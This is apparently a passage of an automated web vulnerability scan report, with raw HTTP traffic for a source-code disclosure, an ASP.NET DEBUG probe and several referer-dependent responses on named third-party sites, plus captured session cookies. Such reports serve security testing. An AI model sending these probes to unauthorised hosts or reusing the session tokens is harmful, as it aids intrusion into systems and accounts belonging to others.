Cookie: JSESSIONID=7A8F0F509BDEAD90EE48E43F3C535E7F; __utmz=94870938.1303854385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2123435684-1303854386635; km_ai=ZEtF5LlpqXlV9eDTnhh0xLfL3xw; __utma=94870938.1634222741.1303854385.1303854385.1303854385.1; __utmc=94870938; __utmb=94870938.4.10.1303854385; km_vs=1; km_lv=1303854392; km_uq=; node=1025

Response

HTTP/1.0 200 OK
Date: Tue, 26 Apr 2011 21:46:37 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Set-Cookie: node=1025; path=/
Connection: close
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8"?>


<wbx-response status="ok">
<wbx-remote-content type="login" title="Sign In"><![CDATA[

<div style="width:860px; text-align:left
...[SNIP]...
<div class="yui-u first" id="wbx-signin-form-div">
<form id="wbx-login-form" action="/account/login.action" method="post" onsubmit="return WbxSignIn.doSignIn(true)">
<div class="box-module">
...[SNIP]...
</label>
<input id="password" title="Password" maxlength="20" name="password" type="password" size="25" /> <span style="" id="forgot-pass" class="medium" title="Forgot your password?">
...[SNIP]...

16. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://myaccount.west.thomson.com
Path:   /MYACCOUNT/Scripts/jscript-inline-message.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /MYACCOUNT/Scripts/jscript-inline-message.js HTTP/1.1
Host: myaccount.west.thomson.com
Connection: keep-alive
Referer: https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LastKnownSiteId=1; c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D; MA_ASP.NET_SessionId=3vutg44502ahok55j2zo3o45

Response

HTTP/1.1 200 OK
Content-Length: 3749
Content-Type: application/x-javascript
Content-Location: http://myaccount.west.thomson.com/MYACCOUNT/Scripts/jscript-inline-message.js
Last-Modified: Fri, 15 Apr 2011 15:05:46 GMT
Accept-Ranges: bytes
ETag: "041e8987efbcb1:1d6a"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:04:44 GMT

...// START OF MESSAGE SCRIPT //
var MSGTIMER = 20;
var MSGSPEED = 5;
var MSGOFFSET = 3;
var MSGHIDE = 3;

// build out the divs, set attributes and call the fade function //
function inlineMsg
...[SNIP]...
arent;
}
} else if (target.y) {
top += target.y;
}
return top;
}

// preload the arrow //
if (document.images) {
arrow = new Image(7, 70);
// arrow.src = '<%=Url.Content("~/images/msg_arrow.gif") %>';
// arrow.src = "<%=Url.Content('~/images/msg_arrow.gif') %>";
arrow.src = "/images/arrow.gif";
}

17. ASP.NET debugging enabled  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.moxiesoft.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: support.moxiesoft.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Tue, 26 Apr 2011 21:01:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

18. Referer-dependent response  previous  next
There are 6 instances of this issue:


18.1. http://bstats.adbrite.com/click/bstats.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bstats.adbrite.com
Path:   /click/bstats.gif

Request 1

GET /click/bstats.gif?kid=48027945&bapid=11748&uid=560800 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/ca.html?ra=8435996260.2377219032496214&rb=271&ca=1783&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre843599625685&pb=&pc=&pd=&pg=&ct=1303843599626
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; vsd=0@1@4db4c1a2@fls.doubleclick.net

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 18:46:37 GMT
Set-Cookie: ut="1%3AHcxLCoAgEADQu8zaRaME4W2UDKJh8hOJOt29aPsWb8CtwQ44QqtnXgtYKLpkFIxtYxYniFdXKZleBdNiMokWnFWhQPSJZ4qCMoEC75hD3v8EnucF"; path=/; domain=.adbrite.com; expires=Fri, 23-Apr-2021 18:46:37 GMT
Set-Cookie: vsd=0@1@4db7130d@a.rfihub.com; path=/; domain=.adbrite.com; expires=Thu, 28-Apr-2011 18:46:37 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 26 Apr 2011 18:46:37 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /click/bstats.gif?kid=48027945&bapid=11748&uid=560800 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; ut="1%3AHctBCoAgEAXQu%2Fy1m1GC8DZGBlFMOUaijncPevvX8Vr4jiPWcsma4ZGSa0UpzU5OtUqTyTYLKd11Y9agRE%2BDwRKYo%2Bz%2FwRgf"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; vsd=0@1@4db4c1a2@fls.doubleclick.net

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 27-Apr-2011 18:46:44 GMT
Set-Cookie: ut="1%3AHcxBCoAgEEDRu8zaRaME4W2UDKJhSo1Ene6etP0PfodHg%2B1whFrOtGawkHVOKHjVjVmcIN5NxWhaEYyLSSRacFaZAtEonmmATKDAO%2BaQ9n8C7%2FsB"; path=/; domain=.adbrite.com; expires=Fri, 23-Apr-2021 18:46:44 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Tue, 26-Apr-2011 18:46:44 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 26 Apr 2011 18:46:44 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

18.2. http://use.typekit.com/k/bpi7eqn-e.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://use.typekit.com
Path:   /k/bpi7eqn-e.css

Request 1

GET /k/bpi7eqn-e.css?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/css
Date: Tue, 26 Apr 2011 21:06:17 GMT
ETag: "989551153+gzip"
Expires: Tue, 26 Apr 2011 21:11:17 GMT
Last-Modified: Wed, 19 Jan 2011 07:13:34 GMT
Server: ECS (dca/5331)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 162454

/*{"mac":"1:c00b11bae5a9df1cfd28e9413f9fe4d0a12314bbc8da5c3479c46b46e813efe4","created":"2011-01-19T07:13:40Z","k":"0.7.25","version":"2410905"}*/
/*
* The fonts and font delivery service used on this website are provided via
* Typekit, and are subject to the End User License Agreement entered into by
* the website owner. All other parties are explicitly restricted from using,
* in any manner, the Services, Licensed Fonts, or Licensed Content. Details
* about using Typekit, the EULA, and information about the fonts are listed
* below.
*
* @name Proxima Nova
* @vendorname Mark Simonson Studio
* @vendorurl http://www.ms-studio.com/
* @licenseurl http://typekit.com/fonts/1b5d0edb63/eula
*
* @name Proxima Nova Condensed
* @vendorname Mark Simonson Studio
* @vendorurl http://www.ms-studio.com/
* @licenseurl http://typekit.com/fonts/47047c7199/eula
*
* (c) 2011 Small Batch Inc.
*/

@font-face {
font-family:"proxima-nova-1";
src:url(data:font/opentype;base64,d09GRgABAAAAAGXIABEAAAAA9NgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABGRlRNAABlrAAAABwAAAAcV3KWjUdERUYAAFtYAAAAHwAAACAA/QAGR1BPUwAAXuAAAAbKAAAkTOcAHLJHU1VCAABbeAAAA2UAAA6gHWmaZU9TLzIAAAH0AAAAWAAAAGBvX6/vY21hcAAABFAAAAFZAAABmi3Rxh9jdnQgAAAHRAAAAEAAAABADYYEVWZwZ20AAAWsAAABAgAAAXMGWZw3Z2x5ZgAACSgAAE8LAACxcAVkQEdoZWFkAAABgAAAADQAAAA28/Ex32hoZWEAAAG0AAAAHwAAACQGtQM7aG10eAAAAkwAAAIBAAADQJikIABsb2NhAAAHhAAAAaIAAAGiDWHjDG1heHAAAAHUAAAAIAAAACAC5gOzbmFtZQAAWDQAAAHCAAADUXNK3OZwb3N0AABZ+AAAAV8AAAHPUlrYaHByZXAAAAawAAAAkwAAAPAJP/HBeNpjYGRgYGBiYHAu0/GP57f5yiDP/AIownDiYrkqjP4/978lcy1zOZDLAVLLwAAARdgMI3jaY2BkYGCe8e8DkNz8f+7/48y1DEARFHABALRwB/QAAAEAAADQAF0ABQBFAAQAAQAAAAAACgAAAgADDwACAAF42mNgYtzKOIGBlYGBaQ9TFwMDQw+EZrz
...[SNIP]...

Request 2

GET /k/bpi7eqn-e.css?3bb2a6e53c9684ffdc9a9bf1135b2a62ecbeaca761fbe87f15aec123ab5093d026e6e1bb0d1ae7cef0cb4486ee99fc9c314d37b0c3e12286285b50bf357d600e4ecf2b4738aa7af9c135b2c105695ad3dd623449abf994d967461f6b4da1162454ed7f3aa00e56b7b2be79831a77ecd09428a672695e1a56a6d92392e4138295c64b8e8e4674fd339a538359c9fa05ea31d66dd5d81e07aa24a5916f02c4dfc3ff68716d18da38b53004367a7a6a526281673d HTTP/1.1
Host: use.typekit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 403 Forbidden
Cache-Control: max-age=300
Content-Type: text/html
Date: Tue, 26 Apr 2011 21:06:21 GMT
Expires: Tue, 26 Apr 2011 21:11:21 GMT
Server: ECS (dca/5331)
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>403 - Forbidden</title>
   </head>
   <body>
       <h1>403 - Forbidden</h1>
   </body>
</html>

18.3. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Request 1

GET /extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://moxieinsight.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.238.113
X-Cnection: close
Date: Tue, 26 Apr 2011 21:07:17 GMT
Content-Length: 1092

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"moxieinsight.com","channel":"http:\/\/moxieinsight.com\/?xd_receiver=1","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":"http:\/\/moxieinsight.com\/","session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

Request 2

GET /extern/login_status.php?api_key=2c9e5bbe7f56d18fa0b9532bc94c9016&extern=0&channel=http%3A%2F%2Fmoxieinsight.com%2F%3Fxd_receiver%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.205.121
X-Cnection: close
Date: Tue, 26 Apr 2011 21:07:43 GMT
Content-Length: 1067

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"moxieinsight.com","channel":"http:\/\/moxieinsight.com\/?xd_receiver=1","connect_state":2,"debug":false,"granted_perms":null,"in_facebook":true,"locale":"en_US","origin":null,"public_session_data":null,"referer_url":null,"session":null,"https":false};
FB.Bootstrap._requireFeatures(["Connect"], function() {
if (config.debug) {
FB.FBDebug.isEnabled = true;
FB.FBDebug.logLevel = 6;
}
FB.XdComm.Server.init("/xd_receiver_v0.4.php");
new FBIntern.LoginStatus().initialize(
config.channel,
config.session,
{ inFacebook: config.in_facebook, locale: config.locale },
config.connect_state,
config.base_domain,
config.public_session_data,
config.referer_url,
config.origin,
config.granted_perms,
config.https
);
});
</script>

18.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/?scope=web&mkt=en-US&FORM=MSMONY
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.8.47
X-Cnection: close
Date: Tue, 26 Apr 2011 18:38:53 GMT
Content-Length: 8536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db7113d85a548d04791653" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 918 others like this.</span><span class="connect_widget_not_connected_text">918 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=bing.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.bing.com%2F%3Fscope%3Dweb%26mkt%3Den-US%26FORM%3DMSMONY&amp;ext
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.232.52
X-Cnection: close
Date: Tue, 26 Apr 2011 18:39:02 GMT
Content-Length: 8389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db71146d7d623506723405" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today&#039;s picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 920 others like this.</span><span class="connect_widget_not_connected_text">920 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

18.5. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.fusionvm.com
Path:   /FusionVM/DesktopDefault.aspx

Request 1

GET /FusionVM/DesktopDefault.aspx HTTP/1.1
Host: www.fusionvm.com
Connection: keep-alive
Referer: http://www.criticalwatch.com/vulnerability-management.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61526075.1303736107.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=61526075.1350494952.1303736107.1303736107.1303736107.1; ASPSESSIONIDQSSATBSQ=OACBHAADIBHEEHNBJFIKBAHA; CriticalWatch_WinMgmt=ee7a5594-6305-4caf-8e32-75811cf5c202; ASP.NET_SessionId=5nwmhdis5hnjwmmysd3y3vr0

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 21:49:02 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Date: Tue, 26 Apr 2011 21:49:02 GMT
Content-Length: 34791


<html>
<head id="htmlHead">
</head>
<body onload="sClock();">
<form method="post" action="DesktopDefault.aspx" id="ctl00">
<div class="aspNetHidden">
<input type="hidden" name="__EVENTTARGET"
...[SNIP]...
